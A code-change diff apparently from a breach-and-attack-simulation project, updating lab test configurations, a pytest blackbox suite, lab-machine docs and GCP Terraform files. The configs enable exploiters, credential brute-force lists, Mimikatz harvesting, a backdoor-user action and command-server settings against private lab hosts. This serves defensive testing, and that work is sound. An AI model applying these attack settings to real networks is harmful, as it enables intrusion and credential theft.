"3Q=(Ge(+&w]*", "12345678",
"^NgDvY59~8", "^NgDvY59~8"
"Ivrrw5zEzs",
"YbS,<tpS.2av"
], ],
"exploit_user_list": [ "exploit_user_list": [
"m0nk3y" "Administrator",
"m0nk3y",
"user"
] ]
},
"general": {
"should_exploit": true
} }
}, },
"basic_network": { "basic_network": {
@ -20,24 +23,7 @@
"local_network_scan": false, "local_network_scan": false,
"subnet_scan_list": [ "subnet_scan_list": [
"10.2.2.2", "10.2.2.2",
"10.2.2.3", "10.2.2.4"
"10.2.2.4",
"10.2.2.5",
"10.2.2.8",
"10.2.2.9",
"10.2.1.9",
"10.2.1.10",
"10.2.2.11",
"10.2.2.12",
"10.2.2.14",
"10.2.2.15",
"10.2.2.16",
"10.2.2.18",
"10.2.2.19",
"10.2.2.20",
"10.2.2.21",
"10.2.2.23",
"10.2.2.24"
] ]
}, },
"network_analysis": { "network_analysis": {
@ -47,10 +33,9 @@
"cnc": { "cnc": {
"servers": { "servers": {
"command_servers": [ "command_servers": [
"192.168.56.1:5000", "10.2.2.251:5000"
"158.129.18.132:5000"
], ],
"current_server": "192.168.56.1:5000", "current_server": "10.2.2.251:5000",
"internet_services": [ "internet_services": [
"monkey.guardicore.com", "monkey.guardicore.com",
"www.google.com" "www.google.com"
@ -60,24 +45,21 @@
"exploits": { "exploits": {
"general": { "general": {
"exploiter_classes": [ "exploiter_classes": [
"SmbExploiter", "SSHExploiter",
"WmiExploiter", "MSSQLExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter", "ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter" "HadoopExploiter"
], ],
"skip_exploit_if_file_exist": false "skip_exploit_if_file_exist": false
}, },
"ms08_067": { "ms08_067": {
"ms08_067_exploit_attempts": 5, "ms08_067_exploit_attempts": 5,
"ms08_067_remote_user_add": "Monkey_IUSER_SUPPORT",
"ms08_067_remote_user_pass": "Password1!",
"remote_user_pass": "Password1!", "remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT" "user_to_add": "Monkey_IUSER_SUPPORT"
}, },
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": { "sambacry": {
"sambacry_folder_paths_to_guess": [ "sambacry_folder_paths_to_guess": [
"/", "/",
@ -110,16 +92,15 @@
"MySQLFinger", "MySQLFinger",
"MSSQLFinger", "MSSQLFinger",
"ElasticFinger" "ElasticFinger"
], ]
"scanner_class": "TcpScanner"
}, },
"dropper": { "dropper": {
"dropper_date_reference_path_linux": "/bin/sh", "dropper_date_reference_path_linux": "/bin/sh",
"dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll", "dropper_date_reference_path_windows": "%windir%\\system32\\kernel32.dll",
"dropper_set_date": true, "dropper_set_date": true,
"dropper_target_path_linux": "/tmp/monkey", "dropper_target_path_linux": "/tmp/monkey",
"dropper_target_path_win_32": "C:\\Windows\\monkey32.exe", "dropper_target_path_win_32": "C:\\Windows\\temp\\monkey32.exe",
"dropper_target_path_win_64": "C:\\Windows\\monkey64.exe", "dropper_target_path_win_64": "C:\\Windows\\temp\\monkey64.exe",
"dropper_try_move_first": true "dropper_try_move_first": true
}, },
"exploits": { "exploits": {
@ -128,7 +109,8 @@
"exploit_ssh_keys": [] "exploit_ssh_keys": []
}, },
"general": { "general": {
"keep_tunnel_open_time": 60, "keep_tunnel_open_time": 1,
"monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}" "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
}, },
"kill_file": { "kill_file": {
@ -145,32 +127,34 @@
}, },
"monkey": { "monkey": {
"behaviour": { "behaviour": {
"self_delete_in_cleanup": false, "PBA_linux_filename": "",
"PBA_windows_filename": "",
"custom_PBA_linux_cmd": "",
"custom_PBA_windows_cmd": "",
"self_delete_in_cleanup": true,
"serialize_config": false, "serialize_config": false,
"use_file_logging": true "use_file_logging": true
}, },
"general": { "general": {
"alive": true, "alive": true,
"post_breach_actions": [ "post_breach_actions": []
"BackdoorUser"
]
}, },
"life_cycle": { "life_cycle": {
"max_iterations": 1, "max_iterations": 1,
"retry_failed_explotation": true, "retry_failed_explotation": true,
"timeout_between_iterations": 100, "timeout_between_iterations": 100,
"victims_max_exploit": 30, "victims_max_exploit": 7,
"victims_max_find": 30 "victims_max_find": 30
}, },
"system_info": { "system_info": {
"collect_system_info": true, "collect_system_info": true,
"extract_azure_creds": true, "extract_azure_creds": false,
"should_use_mimikatz": true "should_use_mimikatz": true
} }
}, },
"network": { "network": {
"ping_scanner": { "ping_scanner": {
"ping_scan_timeout": 1000 "ping_scan_timeout": 500
}, },
"tcp_scanner": { "tcp_scanner": {
"HTTP_PORTS": [ "HTTP_PORTS": [
@ -181,8 +165,8 @@
7001 7001
], ],
"tcp_scan_get_banner": true, "tcp_scan_get_banner": true,
"tcp_scan_interval": 200, "tcp_scan_interval": 0,
"tcp_scan_timeout": 3000, "tcp_scan_timeout": 1000,
"tcp_target_ports": [ "tcp_target_ports": [
22, 22,
2222, 2222,
@ -199,4 +183,4 @@
] ]
} }
} }
} }

View File

@ -23,7 +23,7 @@
"depth": 2, "depth": 2,
"local_network_scan": false, "local_network_scan": false,
"subnet_scan_list": [ "subnet_scan_list": [
"10.2.2.38" "10.2.2.8"
] ]
}, },
"network_analysis": { "network_analysis": {

View File

@ -21,7 +21,7 @@
"depth": 2, "depth": 2,
"local_network_scan": false, "local_network_scan": false,
"subnet_scan_list": [ "subnet_scan_list": [
"10.2.2.44", "10.2.2.14",
"10.2.2.15" "10.2.2.15"
] ]
}, },

View File

@ -22,8 +22,8 @@
"depth": 2, "depth": 2,
"local_network_scan": false, "local_network_scan": false,
"subnet_scan_list": [ "subnet_scan_list": [
"10.2.2.41", "10.2.2.11",
"10.2.2.42" "10.2.2.12"
] ]
}, },
"network_analysis": { "network_analysis": {

View File

@ -10,7 +10,8 @@
"exploit_user_list": [ "exploit_user_list": [
"Administrator", "Administrator",
"root", "root",
"user" "user",
"vakaris_zilius"
] ]
}, },
"general": { "general": {
@ -23,8 +24,8 @@
"depth": 2, "depth": 2,
"local_network_scan": false, "local_network_scan": false,
"subnet_scan_list": [ "subnet_scan_list": [
"10.2.2.9", "10.2.2.23",
"10.2.2.11" "10.2.2.24"
] ]
}, },
"network_analysis": { "network_analysis": {
@ -46,16 +47,7 @@
"exploits": { "exploits": {
"general": { "general": {
"exploiter_classes": [ "exploiter_classes": [
"SmbExploiter", "Struts2Exploiter"
"WmiExploiter",
"SSHExploiter",
"ShellShockExploiter",
"SambaCryExploiter",
"ElasticGroovyExploiter",
"Struts2Exploiter",
"WebLogicExploiter",
"HadoopExploiter",
"VSFTPDExploiter"
], ],
"skip_exploit_if_file_exist": false "skip_exploit_if_file_exist": false
}, },
@ -64,9 +56,6 @@
"remote_user_pass": "Password1!", "remote_user_pass": "Password1!",
"user_to_add": "Monkey_IUSER_SUPPORT" "user_to_add": "Monkey_IUSER_SUPPORT"
}, },
"rdp_grinder": {
"rdp_use_vbs_download": true
},
"sambacry": { "sambacry": {
"sambacry_folder_paths_to_guess": [ "sambacry_folder_paths_to_guess": [
"/", "/",
@ -116,7 +105,7 @@
"exploit_ssh_keys": [] "exploit_ssh_keys": []
}, },
"general": { "general": {
"keep_tunnel_open_time": 1, "keep_tunnel_open_time": 60,
"monkey_dir_name": "monkey_dir", "monkey_dir_name": "monkey_dir",
"singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}" "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}"
}, },
@ -144,19 +133,27 @@
}, },
"general": { "general": {
"alive": true, "alive": true,
"post_breach_actions": [] "post_breach_actions": [
"CommunicateAsNewUser"
]
}, },
"life_cycle": { "life_cycle": {
"max_iterations": 1, "max_iterations": 1,
"retry_failed_explotation": true, "retry_failed_explotation": true,
"timeout_between_iterations": 100, "timeout_between_iterations": 100,
"victims_max_exploit": 7, "victims_max_exploit": 15,
"victims_max_find": 30 "victims_max_find": 100
}, },
"system_info": { "system_info": {
"collect_system_info": true, "collect_system_info": true,
"extract_azure_creds": true, "extract_azure_creds": true,
"should_use_mimikatz": true "should_use_mimikatz": true,
"system_info_collectors_classes": [
"EnvironmentCollector",
"AwsCollector",
"HostnameCollector",
"ProcessListCollector"
]
} }
}, },
"network": { "network": {
@ -186,7 +183,8 @@
8008, 8008,
3306, 3306,
9200, 9200,
7001 7001,
8088
] ]
} }
} }

View File

@ -5,10 +5,16 @@
"Password1!", "Password1!",
"3Q=(Ge(+&w]*", "3Q=(Ge(+&w]*",
"`))jU7L(w}", "`))jU7L(w}",
"12345678" "t67TC5ZDmz",
"12345678",
"another_one",
"and_another_one",
"one_more"
], ],
"exploit_user_list": [ "exploit_user_list": [
"Administrator", "Administrator",
"rand",
"rand2",
"m0nk3y", "m0nk3y",
"user" "user"
] ]
@ -23,9 +29,10 @@
"depth": 3, "depth": 3,
"local_network_scan": false, "local_network_scan": false,
"subnet_scan_list": [ "subnet_scan_list": [
"10.2.2.32", "10.2.2.9",
"10.2.1.10", "10.2.1.10",
"10.2.0.11" "10.2.0.11",
"10.2.0.12"
] ]
}, },
"network_analysis": { "network_analysis": {

View File

@ -21,7 +21,7 @@
"depth": 2, "depth": 2,
"local_network_scan": false, "local_network_scan": false,
"subnet_scan_list": [ "subnet_scan_list": [
"10.2.2.44", "10.2.2.14",
"10.2.2.15" "10.2.2.15"
] ]
}, },

View File

@ -4,6 +4,7 @@ import logging
import pytest import pytest
from time import sleep from time import sleep
from envs.monkey_zoo.blackbox.analyzers.performance_analyzer import PerformanceAnalyzer
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient
from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import CommunicationAnalyzer
from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser from envs.monkey_zoo.blackbox.island_client.island_config_parser import IslandConfigParser
@ -13,9 +14,9 @@ from envs.monkey_zoo.blackbox.log_handlers.test_logs_handler import TestLogsHand
DEFAULT_TIMEOUT_SECONDS = 5*60 DEFAULT_TIMEOUT_SECONDS = 5*60
MACHINE_BOOTUP_WAIT_SECONDS = 30 MACHINE_BOOTUP_WAIT_SECONDS = 30
GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'haddop-2-v3', 'hadoop-3', 'mssql-16', GCP_TEST_MACHINE_LIST = ['sshkeys-11', 'sshkeys-12', 'elastic-4', 'elastic-5', 'hadoop-2', 'hadoop-3', 'mssql-16',
'mimikatz-14', 'mimikatz-15', 'final-test-struts2-23', 'final-test-struts2-24', 'mimikatz-14', 'mimikatz-15', 'struts2-23', 'struts2-24', 'tunneling-9', 'tunneling-10',
'tunneling-9', 'tunneling-10', 'tunneling-11', 'weblogic-18', 'weblogic-19', 'shellshock-8'] 'tunneling-11', 'tunneling-12', 'weblogic-18', 'weblogic-19', 'shellshock-8']
LOG_DIR_PATH = "./logs" LOG_DIR_PATH = "./logs"
LOGGER = logging.getLogger(__name__) LOGGER = logging.getLogger(__name__)
@ -58,12 +59,30 @@ class TestMonkeyBlackbox(object):
config_parser = IslandConfigParser(conf_filename) config_parser = IslandConfigParser(conf_filename)
analyzer = CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets()) analyzer = CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path()) log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
BasicTest(test_name, BasicTest(
island_client, name=test_name,
config_parser, island_client=island_client,
[analyzer], config_parser=config_parser,
timeout_in_seconds, analyzers=[analyzer],
log_handler).run() timeout=timeout_in_seconds,
post_exec_analyzers=[],
log_handler=log_handler).run()
@staticmethod
def run_performance_test(island_client, conf_filename, test_name, timeout_in_seconds):
config_parser = IslandConfigParser(conf_filename)
log_handler = TestLogsHandler(test_name, island_client, TestMonkeyBlackbox.get_log_dir_path())
BasicTest(
name=test_name,
island_client=island_client,
config_parser=config_parser,
analyzers=[CommunicationAnalyzer(island_client, config_parser.get_ips_of_targets())],
timeout=timeout_in_seconds,
post_exec_analyzers=[PerformanceAnalyzer(
island_client,
break_if_took_too_long=False
)],
log_handler=log_handler).run()
@staticmethod @staticmethod
def get_log_dir_path(): def get_log_dir_path():
@ -99,12 +118,26 @@ class TestMonkeyBlackbox(object):
def test_shellshock_exploiter(self, island_client): def test_shellshock_exploiter(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "SHELLSHOCK.conf", "Shellschock_exploiter") TestMonkeyBlackbox.run_basic_test(island_client, "SHELLSHOCK.conf", "Shellschock_exploiter")
@pytest.mark.xfail(reason="Test fails randomly - still investigating.")
def test_tunneling(self, island_client): def test_tunneling(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 10*60) TestMonkeyBlackbox.run_basic_test(island_client, "TUNNELING.conf", "Tunneling_exploiter", 15*60)
def test_wmi_and_mimikatz_exploiters(self, island_client): def test_wmi_and_mimikatz_exploiters(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz") TestMonkeyBlackbox.run_basic_test(island_client, "WMI_MIMIKATZ.conf", "WMI_exploiter,_mimikatz")
def test_wmi_pth(self, island_client): def test_wmi_pth(self, island_client):
TestMonkeyBlackbox.run_basic_test(island_client, "WMI_PTH.conf", "WMI_PTH") TestMonkeyBlackbox.run_basic_test(island_client, "WMI_PTH.conf", "WMI_PTH")
@pytest.mark.xfail(reason="Performance is slow, will improve on release 1.9.")
def test_performance(self, island_client):
"""
This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test
for a total of 8 machines including the Monkey Island.
Is has 2 analyzers - the regular one which checks all the Monkeys
and the Timing one which checks how long the report took to execute
"""
TestMonkeyBlackbox.run_performance_test(
island_client,
"PERFORMANCE.conf",
"test_report_performance",
timeout_in_seconds=10*60)

View File

@ -1,4 +1,3 @@
import json
from time import sleep from time import sleep
import logging import logging
@ -14,16 +13,16 @@ LOGGER = logging.getLogger(__name__)
class BasicTest(object): class BasicTest(object):
def __init__(self, name, island_client, config_parser, analyzers, timeout, log_handler): def __init__(self, name, island_client, config_parser, analyzers, timeout, post_exec_analyzers, log_handler):
self.name = name self.name = name
self.island_client = island_client self.island_client = island_client
self.config_parser = config_parser self.config_parser = config_parser
self.analyzers = analyzers self.analyzers = analyzers
self.post_exec_analyzers = post_exec_analyzers
self.timeout = timeout self.timeout = timeout
self.log_handler = log_handler self.log_handler = log_handler
def run(self): def run(self):
LOGGER.info("Uploading configuration:\n{}".format(json.dumps(self.config_parser.config_json, indent=2)))
self.island_client.import_config(self.config_parser.config_raw) self.island_client.import_config(self.config_parser.config_raw)
self.print_test_starting_info() self.print_test_starting_info()
try: try:
@ -33,13 +32,13 @@ class BasicTest(object):
self.island_client.kill_all_monkeys() self.island_client.kill_all_monkeys()
self.wait_until_monkeys_die() self.wait_until_monkeys_die()
self.wait_for_monkey_process_to_finish() self.wait_for_monkey_process_to_finish()
self.test_post_exec_analyzers()
self.parse_logs() self.parse_logs()
self.island_client.reset_env() self.island_client.reset_env()
def print_test_starting_info(self): def print_test_starting_info(self):
LOGGER.info("Started {} test".format(self.name)) LOGGER.info("Started {} test".format(self.name))
LOGGER.info("Machines participating in test:") LOGGER.info("Machines participating in test: " + ", ".join(self.config_parser.get_ips_of_targets()))
LOGGER.info(" ".join(self.config_parser.get_ips_of_targets()))
print("") print("")
def test_until_timeout(self): def test_until_timeout(self):
@ -63,10 +62,8 @@ class BasicTest(object):
timer.get_time_taken())) timer.get_time_taken()))
def all_analyzers_pass(self): def all_analyzers_pass(self):
for analyzer in self.analyzers: analyzers_results = [analyzer.analyze_test_results() for analyzer in self.analyzers]
if not analyzer.analyze_test_results(): return all(analyzers_results)
return False
return True
def get_analyzer_logs(self): def get_analyzer_logs(self):
log = "" log = ""
@ -95,4 +92,9 @@ class BasicTest(object):
If we try to launch monkey during that time window monkey will fail to start, that's If we try to launch monkey during that time window monkey will fail to start, that's
why test needs to wait a bit even after all monkeys are dead. why test needs to wait a bit even after all monkeys are dead.
""" """
LOGGER.debug("Waiting for Monkey process to close...")
sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH) sleep(TIME_FOR_MONKEY_PROCESS_TO_FINISH)
def test_post_exec_analyzers(self):
post_exec_analyzers_results = [analyzer.analyze_test_results() for analyzer in self.post_exec_analyzers]
assert all(post_exec_analyzers_results)

View File

@ -546,6 +546,38 @@ fullTest.conf is a good config to start, because it covers all machines.
</tbody> </tbody>
</table> </table>
<table>
<thead>
<tr class="header">
<th><p><span id="_Toc536021463" class="anchor"></span>Nr. <strong>12</strong> Tunneling M4</p>
<p>(10.2.0.12)</p></th>
<th>(Exploitable)</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td>OS:</td>
<td><strong>Windows server 2019 x64</strong></td>
</tr>
<tr class="odd">
<td>Default services port:</td>
<td>445</td>
</tr>
<tr class="even">
<td>Root password:</td>
<td>t67TC5ZDmz</td>
</tr>
<tr class="odd">
<td>Servers config:</td>
<td>Default</td>
</tr>
<tr class="even">
<td>Notes:</td>
<td>Accessible only trough Nr.10</td>
</tr>
</tbody>
</table>
<table> <table>
<thead> <thead>
<tr class="header"> <tr class="header">

View File

@ -2,7 +2,7 @@ provider "google" {
project = "test-000000" project = "test-000000"
region = "europe-west3" region = "europe-west3"
zone = "europe-west3-b" zone = "europe-west3-b"
credentials = "${file("../gcp_keys/gcp_key.json")}" credentials = file("../gcp_keys/gcp_key.json")
} }
locals { locals {
resource_prefix = "" resource_prefix = ""

View File

@ -1,6 +1,6 @@
resource "google_compute_firewall" "islands-in" { resource "google_compute_firewall" "islands-in" {
name = "${local.resource_prefix}islands-in" name = "${local.resource_prefix}islands-in"
network = "${google_compute_network.monkeyzoo.name}" network = google_compute_network.monkeyzoo.name
allow { allow {
protocol = "tcp" protocol = "tcp"
@ -14,7 +14,7 @@ resource "google_compute_firewall" "islands-in" {
resource "google_compute_firewall" "islands-out" { resource "google_compute_firewall" "islands-out" {
name = "${local.resource_prefix}islands-out" name = "${local.resource_prefix}islands-out"
network = "${google_compute_network.monkeyzoo.name}" network = google_compute_network.monkeyzoo.name
allow { allow {
protocol = "tcp" protocol = "tcp"
@ -27,7 +27,7 @@ resource "google_compute_firewall" "islands-out" {
resource "google_compute_firewall" "monkeyzoo-in" { resource "google_compute_firewall" "monkeyzoo-in" {
name = "${local.resource_prefix}monkeyzoo-in" name = "${local.resource_prefix}monkeyzoo-in"
network = "${google_compute_network.monkeyzoo.name}" network = google_compute_network.monkeyzoo.name
allow { allow {
protocol = "all" protocol = "all"
@ -35,12 +35,12 @@ resource "google_compute_firewall" "monkeyzoo-in" {
direction = "INGRESS" direction = "INGRESS"
priority = "65534" priority = "65534"
source_ranges = ["10.2.2.0/24", "10.2.1.0/27"] source_ranges = ["10.2.2.0/24"]
} }
resource "google_compute_firewall" "monkeyzoo-out" { resource "google_compute_firewall" "monkeyzoo-out" {
name = "${local.resource_prefix}monkeyzoo-out" name = "${local.resource_prefix}monkeyzoo-out"
network = "${google_compute_network.monkeyzoo.name}" network = google_compute_network.monkeyzoo.name
allow { allow {
protocol = "all" protocol = "all"
@ -48,52 +48,53 @@ resource "google_compute_firewall" "monkeyzoo-out" {
direction = "EGRESS" direction = "EGRESS"
priority = "65534" priority = "65534"
destination_ranges = ["10.2.2.0/24", "10.2.1.0/27"] destination_ranges = ["10.2.2.0/24"]
} }
resource "google_compute_firewall" "tunneling-in" { resource "google_compute_firewall" "tunneling-in" {
name = "${local.resource_prefix}tunneling-in" name = "${local.resource_prefix}tunneling-in"
network = "${google_compute_network.tunneling.name}" network = google_compute_network.tunneling.name
allow { allow {
protocol = "all" protocol = "all"
} }
direction = "INGRESS" direction = "INGRESS"
source_ranges = ["10.2.2.0/24", "10.2.0.0/28"] source_ranges = ["10.2.1.0/24"]
} }
resource "google_compute_firewall" "tunneling-out" { resource "google_compute_firewall" "tunneling-out" {
name = "${local.resource_prefix}tunneling-out" name = "${local.resource_prefix}tunneling-out"
network = "${google_compute_network.tunneling.name}" network = google_compute_network.tunneling.name
allow { allow {
protocol = "all" protocol = "all"
} }
direction = "EGRESS" direction = "EGRESS"
destination_ranges = ["10.2.2.0/24", "10.2.0.0/28"] destination_ranges = ["10.2.1.0/24"]
} }
resource "google_compute_firewall" "tunneling2-in" { resource "google_compute_firewall" "tunneling2-in" {
name = "${local.resource_prefix}tunneling2-in" name = "${local.resource_prefix}tunneling2-in"
network = "${google_compute_network.tunneling2.name}" network = google_compute_network.tunneling2.name
allow { allow {
protocol = "all" protocol = "all"
} }
direction = "INGRESS" direction = "INGRESS"
source_ranges = ["10.2.1.0/27"] source_ranges = ["10.2.0.0/24"]
} }
resource "google_compute_firewall" "tunneling2-out" { resource "google_compute_firewall" "tunneling2-out" {
name = "${local.resource_prefix}tunneling2-out" name = "${local.resource_prefix}tunneling2-out"
network = "${google_compute_network.tunneling2.name}" network = google_compute_network.tunneling2.name
allow { allow {
protocol = "all" protocol = "all"
} }
direction = "EGRESS" direction = "EGRESS"
destination_ranges = ["10.2.1.0/27"] destination_ranges = ["10.2.0.0/24"]
} }

View File

@ -1,19 +1,19 @@
//Custom cloud images //Custom cloud images
data "google_compute_image" "hadoop-2" { data "google_compute_image" "hadoop-2" {
name = "hadoop-2" name = "hadoop-2"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "hadoop-3" { data "google_compute_image" "hadoop-3" {
name = "hadoop-3" name = "hadoop-3"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "elastic-4" { data "google_compute_image" "elastic-4" {
name = "elastic-4" name = "elastic-4"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "elastic-5" { data "google_compute_image" "elastic-5" {
name = "elastic-5" name = "elastic-5"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
/* /*
@ -23,73 +23,73 @@ data "google_compute_image" "sambacry-6" {
*/ */
data "google_compute_image" "shellshock-8" { data "google_compute_image" "shellshock-8" {
name = "shellshock-8" name = "shellshock-8"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "tunneling-9" { data "google_compute_image" "tunneling-9" {
name = "tunneling-9" name = "tunneling-9"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "tunneling-10" { data "google_compute_image" "tunneling-10" {
name = "tunneling-10" name = "tunneling-10"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "tunneling-11" { data "google_compute_image" "tunneling-11" {
name = "tunneling-11" name = "tunneling-11"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "sshkeys-11" { data "google_compute_image" "sshkeys-11" {
name = "sshkeys-11" name = "sshkeys-11"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "sshkeys-12" { data "google_compute_image" "sshkeys-12" {
name = "sshkeys-12" name = "sshkeys-12"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "mimikatz-14" { data "google_compute_image" "mimikatz-14" {
name = "mimikatz-14" name = "mimikatz-14"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "mimikatz-15" { data "google_compute_image" "mimikatz-15" {
name = "mimikatz-15" name = "mimikatz-15"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "mssql-16" { data "google_compute_image" "mssql-16" {
name = "mssql-16" name = "mssql-16"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "weblogic-18" { data "google_compute_image" "weblogic-18" {
name = "weblogic-18" name = "weblogic-18"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "weblogic-19" { data "google_compute_image" "weblogic-19" {
name = "weblogic-19" name = "weblogic-19"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "smb-20" { data "google_compute_image" "smb-20" {
name = "smb-20" name = "smb-20"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "scan-21" { data "google_compute_image" "scan-21" {
name = "scan-21" name = "scan-21"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "scan-22" { data "google_compute_image" "scan-22" {
name = "scan-22" name = "scan-22"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "struts2-23" { data "google_compute_image" "struts2-23" {
name = "struts2-23" name = "struts2-23"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "struts2-24" { data "google_compute_image" "struts2-24" {
name = "struts2-24" name = "struts2-24"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "island-linux-250" { data "google_compute_image" "island-linux-250" {
name = "island-linux-250" name = "island-linux-250"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }
data "google_compute_image" "island-windows-251" { data "google_compute_image" "island-windows-251" {
name = "island-windows-251" name = "island-windows-251"
project = "${local.monkeyzoo_project}" project = local.monkeyzoo_project
} }

View File

@ -1,8 +1,8 @@
// Local variables // Local variables
locals { locals {
default_ubuntu="${google_compute_instance_template.ubuntu16.self_link}" default_ubuntu=google_compute_instance_template.ubuntu16.self_link
default_windows="${google_compute_instance_template.windows2016.self_link}" default_windows=google_compute_instance_template.windows2016.self_link
} }
resource "google_compute_network" "monkeyzoo" { resource "google_compute_network" "monkeyzoo" {
@ -23,27 +23,27 @@ resource "google_compute_network" "tunneling2" {
resource "google_compute_subnetwork" "monkeyzoo-main" { resource "google_compute_subnetwork" "monkeyzoo-main" {
name = "${local.resource_prefix}monkeyzoo-main" name = "${local.resource_prefix}monkeyzoo-main"
ip_cidr_range = "10.2.2.0/24" ip_cidr_range = "10.2.2.0/24"
network = "${google_compute_network.monkeyzoo.self_link}" network = google_compute_network.monkeyzoo.self_link
} }
resource "google_compute_subnetwork" "tunneling-main" { resource "google_compute_subnetwork" "tunneling-main" {
name = "${local.resource_prefix}tunneling-main" name = "${local.resource_prefix}tunneling-main"
ip_cidr_range = "10.2.1.0/28" ip_cidr_range = "10.2.1.0/28"
network = "${google_compute_network.tunneling.self_link}" network = google_compute_network.tunneling.self_link
} }
resource "google_compute_subnetwork" "tunneling2-main" { resource "google_compute_subnetwork" "tunneling2-main" {
name = "${local.resource_prefix}tunneling2-main" name = "${local.resource_prefix}tunneling2-main"
ip_cidr_range = "10.2.0.0/27" ip_cidr_range = "10.2.0.0/27"
network = "${google_compute_network.tunneling2.self_link}" network = google_compute_network.tunneling2.self_link
} }
resource "google_compute_instance_from_template" "hadoop-2" { resource "google_compute_instance_from_template" "hadoop-2" {
name = "${local.resource_prefix}hadoop-2" name = "${local.resource_prefix}hadoop-2"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.hadoop-2.self_link}" image = data.google_compute_image.hadoop-2.self_link
} }
auto_delete = true auto_delete = true
} }
@ -57,10 +57,10 @@ resource "google_compute_instance_from_template" "hadoop-2" {
resource "google_compute_instance_from_template" "hadoop-3" { resource "google_compute_instance_from_template" "hadoop-3" {
name = "${local.resource_prefix}hadoop-3" name = "${local.resource_prefix}hadoop-3"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.hadoop-3.self_link}" image = data.google_compute_image.hadoop-3.self_link
} }
auto_delete = true auto_delete = true
} }
@ -72,10 +72,10 @@ resource "google_compute_instance_from_template" "hadoop-3" {
resource "google_compute_instance_from_template" "elastic-4" { resource "google_compute_instance_from_template" "elastic-4" {
name = "${local.resource_prefix}elastic-4" name = "${local.resource_prefix}elastic-4"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.elastic-4.self_link}" image = data.google_compute_image.elastic-4.self_link
} }
auto_delete = true auto_delete = true
} }
@ -87,10 +87,10 @@ resource "google_compute_instance_from_template" "elastic-4" {
resource "google_compute_instance_from_template" "elastic-5" { resource "google_compute_instance_from_template" "elastic-5" {
name = "${local.resource_prefix}elastic-5" name = "${local.resource_prefix}elastic-5"
source_instance_template = "${local.default_windows}" source_instance_template = local.default_windows
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.elastic-5.self_link}" image = data.google_compute_image.elastic-5.self_link
} }
auto_delete = true auto_delete = true
} }
@ -135,10 +135,10 @@ resource "google_compute_instance_from_template" "sambacry-7" {
resource "google_compute_instance_from_template" "shellshock-8" { resource "google_compute_instance_from_template" "shellshock-8" {
name = "${local.resource_prefix}shellshock-8" name = "${local.resource_prefix}shellshock-8"
source_instance_template = "${local.default_ubuntu}" source_instance_template = local.default_ubuntu
boot_disk{ boot_disk{
initialize_params { initialize_params {
image = "${data.google_compute_image.shellshock-8.self_link}" image = data.google_compute_image.shellshock-8.self_link
} }
auto_delete = true auto_delete = true
} }
